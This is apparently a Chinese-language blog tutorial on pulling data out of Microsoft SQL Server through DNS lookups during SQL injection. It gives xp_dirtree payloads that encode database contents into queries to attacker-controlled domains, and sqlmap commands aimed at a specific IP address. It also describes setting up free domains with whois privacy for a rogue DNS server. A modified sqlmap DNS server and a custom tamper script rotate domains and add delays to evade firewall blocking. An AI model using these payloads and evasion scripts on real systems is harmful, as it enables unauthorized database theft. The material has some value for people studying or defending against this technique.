Data Exfiltration with DNS in MSSQL SQLi attacks

DNS解析过程

DNS解析过程

DNS 查询的过程如下图1所示。

图1

文字举例说明：

假定浏览器想知道域名xprp8i.dnslog.cn的IP地址。

1、浏览器先向本地DNS服务器进行递归查询。

2、本地域名服务器采用迭代查询。它先向一个根域名服务器查询。

3、根域名服务器告诉本地DNS服务器，下一次应查询的顶级域名服务器a.dns.cn的IP地址。

4、本地域名服务器向顶级域名服务器a.dns.cn进行查询。

5、顶级域名服务器dns.cn告诉本地域名服务器，下一步应查询的权限服务器ns1.dnslog.cn的IP地址。

6、本地域名服务器向权限域名服务器ns1.dnslog.cn进行查询。

7、权限域名服务器ns1.dnslog.cn告诉本地域名服务器，xprp8i.dnslog.cn的IP地址。

8、本地域名服务器最后把查询结果告诉浏览器。

递归查询

从客户端到本地DNS服务器是属于递归查询。

迭代查询

DNS服务器之间的交互查询就是迭代查询。本地使用nslookup模拟一下这个过程，以查询xprp8i.dnslog.cn为例。

1、将DNS请求发送至其中一台根DNS服务器。

根DNS服务器收到请求后会判断这个域名(.cn)是谁来授权管理，并会返回负责该顶级域名的NS记录。

命令：

nslookup -q=a xprp8i.dnslog.cn 198.41.0.4

应答:

in-addr.arpa    nameserver = e.in-addr-servers.arpa

in-addr.arpa    nameserver = f.in-addr-servers.arpa

in-addr.arpa    nameserver = d.in-addr-servers.arpa

in-addr.arpa    nameserver = c.in-addr-servers.arpa

in-addr.arpa    nameserver = b.in-addr-servers.arpa

in-addr.arpa    nameserver = a.in-addr-servers.arpa

e.in-addr-servers.arpa  internet address = 203.119.86.101

e.in-addr-servers.arpa  AAAA IPv6 address = 2001:dd8:6::101

f.in-addr-servers.arpa  internet address = 193.0.9.1

f.in-addr-servers.arpa  AAAA IPv6 address = 2001:67c:e0::1

d.in-addr-servers.arpa  internet address = 200.10.60.53

d.in-addr-servers.arpa  AAAA IPv6 address = 2001:13c7:7010::53

c.in-addr-servers.arpa  internet address = 196.216.169.10

c.in-addr-servers.arpa  AAAA IPv6 address = 2001:43f8:110::10

b.in-addr-servers.arpa  internet address = 199.253.183.183

b.in-addr-servers.arpa  AAAA IPv6 address = 2001:500:87::87

a.in-addr-servers.arpa  internet address = 199.180.182.53

a.in-addr-servers.arpa  AAAA IPv6 address = 2620:37:e000::53

Server:  UnKnown

Address:  198.41.0.4

Name:    xprp8i.dnslog.cn

Served by:

- a.dns.cn

203.119.25.1

2001:dc7::1

cn

- b.dns.cn

203.119.26.1

cn

- c.dns.cn

203.119.27.1

cn

- d.dns.cn

203.119.28.1

2001:dc7:1000::1

cn

- e.dns.cn

203.119.29.1

cn

- f.dns.cn

195.219.8.90

cn

- g.dns.cn

66.198.183.65

cn

- ns.cernet.net

202.112.0.44

Cn

2、向其中一台负责cn顶级域的DNS服务器发起请求

命令：

nslookup -q=a xprp8i.dnslog.cn 195.219.8.90

应答:

DNS request timed out.

timeout was 2 seconds.

Server:  UnKnown

Address:  195.219.8.90

DNS request timed out.

timeout was 2 seconds.

Name:    xprp8i.dnslog.cn

Served by:

- ns1.dnslog.cn

47.244.138.18

dnslog.cn

- ns2.dnslog.cn

47.244.138.18

dnslog.cn

3、向其中一台负责dnslog.cn二级域的DNS服务器发起请求

最终，经查询得到了xprp8i.dnslog.cn对应的IP地址（此处是127.0.0.1）

命令：

nslookup -q=a xprp8i.dnslog.cn 47.244.138.18

应答：

Server:  UnKnown

Address:  47.244.138.18

Non-authoritative answer:

Name:    xprp8i.dnslog.cn

Address:  127.0.0.1

参考：

https://www.zhihu.com/question/23042131

https://zhidao.baidu.com/question/424525391971643892.html

DNS隧道测试

工具：

http://dnslog.cn/

点击“Get SubDomain”获取域名，点击“Refresh Record”查看请求记录。

SQL语句：

declare @host varchar(800);

select @host = 'test.k8xdu5.dnslog.cn';

exec ('master..xp_dirtree "\\'+@host+'\foobar$"');

使用SQL SERVER MANAGEMENT STUDIO新建查询

图3

如果刷新后可以看到我们提交的查询数据，说明DNS请求可以出得来，可进一步利用。

图4

自行搭建dnslog

注意：IP地址需要与注册信息中的国家相符合，否则注册失败。

网址:http://www.Freenom.com

1、先检测待注册域名的可用性。

2、注册的时候，在DNS选项中，选择使用自己的DNS，新建DNS服务器的地址，例如我这里自定义了两个dns服务器，分别是ns0.nogan.ga和ns1.nogan.ga，并且将他们的地址指向我的VPS服务器。

3、点击Continue，进入到结算页面。

如果你上一步没有注册用户，那么可以直接在这里填你用来注册用户的邮箱，然后根据指引进行操作。如果注册了用户，只需要直接登录就可以了。

4、进入到Review and Checkout页面，填入一些你的基本信息就可以了

5、这里记得勾选Lock profile，你的信息就不会被whois查询到了。接着下一步，勾选Complate Order，域名就注册成功了。

6、部署DNS服务

登录你的VPS服务器，运行下面这个python脚本，将在你的VPS主机监听UDP 53端口，并且回复DNS响应包：

Dsn.py:

https://github.com/sqlmapproject/sqlmap/blob/master/lib/request/dns.py

7、执行ping命令测试 效果

看到结果说明成功。

Ping test.buyao2.ga

参考：

https://www.cnblogs.com/Chorder/p/9087386.html

SQLMAP实现分析

看看sqlmap是怎么处理-v 3查看payload：

DECLARE @host varchar(1024);

SELECT @host='rMy.'+(SELECT TOP 1 master.dbo.fn_varbintohexstr(CAST

(SUBSTRING((ISNULL(CAST(name AS NVARCHAR(4000)),' ')),1,13) AS

VARBINARY(8000))) FROM master..sysdatabases WHERE name NOT IN

(SELECT TOP 4 name FROM master..sysdatabases ORDER BY name) ORDER BY

name)+'.Nrz.rainism.cc';

EXEC('master..xp_dirtree "\\'+@host+'\cCkc"');

知识点

1、通过在域名中添加随机字符串'rMy','Nrz'确保每次查询dns不存在缓存。

2、通过使用substring（）函数每次传输特定位数的数据，防止UNC路径超过128个字符，导致错误。

3、通过使用master.dbo.fn_varbintohexstr()存储过程对获得数据进行16进制编码，防止出现非法字符导致语法错误，查询失败。

Sql语句

sqlmap -u 'http://188.166.29.114/test.php?uid=1' -p uid --dbs --dns-domain yourdomain.online

实战中遇到的问题

问题描述

大概率由于对方防火墙的原因，当获取20条左右的数据时lib\request\dns.py文件就出现以下错误，之后就获取不到数据了，然后歇会几分钟后，重新再来又可以获取到数据了。推测可能是访问频繁，导致域名被暂时封堵。

[Error 10054] An exiting connection was forcibly closed by the remote host

对策

申请多个域名，反正freenom.com免费申请，然后写个tamper随机选择域名。我申请了10个域名，效果是，还会报错但是能撑到100条这样。继续改进，捕获dns.py产生的sock error 10054错误，并且当出错的时候，通过waitfor delay语句进行延时注入。所以最终方案是，修改了dns.py和添加了一个tamper。完美解决，能一次性获取到上千条不中断了，就算出错也能较快恢复，执行完sqlmap一觉醒来，就收获满满了。

使用

sqlmap -u 'http://188.166.29.114/test.php?uid=1' -p uid --dbs --dns-domain dnslog.cn -t 8  --random-agent --tamper randomdns

Dns.py

#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import os
import re
import socket
import threading
import time

class DNSQuery(object):
    """
    Used for making fake DNS resolution responses based on received
    raw request

    Reference(s):
        http://code.activestate.com/recipes/491264-mini-fake-dns-server/
        https://code.google.com/p/marlon-tools/source/browse/tools/dnsproxy/dnsproxy.py
    """

    def __init__(self, raw):
        self._raw = raw
        self._query = ""

        type_ = (ord(raw[2]) >> 3) & 15                 # Opcode bits

        if type_ == 0:                                  # Standard query
            i = 12
            j = ord(raw[i])

            while j != 0:
                self._query += raw[i + 1:i + j + 1] + '.'
                i = i + j + 1
                j = ord(raw[i])

    def response(self, resolution):
        """
        Crafts raw DNS resolution response packet
        """

        retVal = ""

        if self._query:
            retVal += self._raw[:2]                                             # Transaction ID
            retVal += "\x85\x80"                                                # Flags (Standard query response, No error)
            retVal += self._raw[4:6] + self._raw[4:6] + "\x00\x00\x00\x00"      # Questions and Answers Counts
            retVal += self._raw[12:(12 + self._raw[12:].find("\x00") + 5)]      # Original Domain Name Query
            retVal += "\xc0\x0c"                                                # Pointer to domain name
            retVal += "\x00\x01"                                                # Type A
            retVal += "\x00\x01"                                                # Class IN
            retVal += "\x00\x00\x00\x20"                                        # TTL (32 seconds)
            retVal += "\x00\x04"                                                # Data length
            retVal += "".join(chr(int(_)) for _ in resolution.split('.'))       # 4 bytes of IP

        return retVal

class DNSServer(object):
    def __init__(self):
        socket.setdefaulttimeout(20)
        self._check_localhost()
        self._requests = []
        self._lock = threading.Lock()
        try:
            self._socket = socket._orig_socket(socket.AF_INET, socket.SOCK_DGRAM)
        except AttributeError:
            self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._socket.bind(("", 53))
        self._running = False
        self._initialized = False

    def _check_localhost(self):
        response = ""
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            s.connect(("", 53))
            s.send("6509012000010000000000010377777706676f6f676c6503636f6d00000100010000291000000000000000".decode("hex"))  # A www.google.com
            response = s.recv(512)
        except:
            pass
        finally:
            if response and "google" in response:
                raise socket.error("another DNS service already running on *:53")

    def pop(self, prefix=None, suffix=None):
        """
        Returns received DNS resolution request (if any) that has given
        prefix/suffix combination (e.g. prefix.<query result>.suffix.domain)
        """

        retVal = None

        with self._lock:
            for _ in self._requests:
                if prefix is None and suffix is None or re.search(r"%s\..+\.%s" % (prefix, suffix), _, re.I):
                    retVal = _
                    self._requests.remove(_)
                    break

        return retVal

    def run(self):
        """
        Runs a DNSServer instance as a daemon thread (killed by program exit)
        """

        def _():
            try:
                self._running = True
                self._initialized = True

                while True:
                    #改了这里
                    try:
                        data, addr = self._socket.recvfrom(1024)
                        _ = DNSQuery(data)
                        self._socket.sendto(_.response("127.0.0.1"), addr)
                        with self._lock:
                            self._requests.append(_._query)
                        fo = open('C:/Users/Administrator/Desktop/sqlmap-1.3/tamper/randomdns.txt', "w")
                        fo.write("OK")
                        fo.close()
                    except socket.error as error:
                        print(error)
                        fo = open('C:/Users/Administrator/Desktop/sqlmap-1.3/tamper/randomdns.txt', "w")
                        fo.write("Error")
                        fo.close()
                        time.sleep(1)
                    #改了这里
            except KeyboardInterrupt:
                raise

            finally:
                self._running = False

        thread = threading.Thread(target=_)
        thread.daemon = True
        thread.start()

if __name__ == "__main__":
    server = None
    try:
        server = DNSServer()
        server.run()

        while not server._initialized:
            time.sleep(0.1)

        while server._running:
            while True:
                _ = server.pop()

                if _ is None:
                    break
                else:
                    print "[i] %s" % _

            time.sleep(1)

    except socket.error, ex:
        if 'Permission' in str(ex):
            print "[x] Please run with sudo/Administrator privileges"
        else:
            raise
    except KeyboardInterrupt:
        os._exit(0)
    finally:
        if server:
            server._running = False

Randomdns.py(tamper)

#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re
import random
import os

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    """

    Tested against:
        * Microsoft SQL Server 2008

    """

    retVal = payload
    domain_list = ['domain1.ga','domain2.ga','domain3.tk','domain4.tk','domain5.gq','domain16.tk','domain7.ml','domain8.ga','domain9.cf','domain10.gq']
    domain = random.choice(domain_list)
    domain = ''.join(random.sample(['z','y','x','w','v','u','t','s','r','q','p','o','n','m','l','k','j','i','h','g','f','e','d','c','b','a'], 3)) + '.' + domain
    waitstr = " waitfor delay '0:0:0:MilliSeconds' --"
    filename = 'C:/Users/Administrator/Desktop/sqlmap-1.3/tamper/randomdns.txt'
    if os.path.exists(filename):
        fo = open(filename, "r")
        msg = fo.read()
        fo.close()
        if msg == "Error":
            waitstr = " waitfor delay '0:0:10:MilliSeconds' --"
        else:
            waitstr = " waitfor delay '0:0:0:MilliSeconds' --"

    ms = str(random.randint(1,999))
    waitstr = re.sub('MilliSeconds',ms,waitstr)
    if payload:
        retVal = re.sub('dnslog.cn',domain,payload)
        retVal = re.sub('--',waitstr,retVal)
    return retVal

转载请注明出处。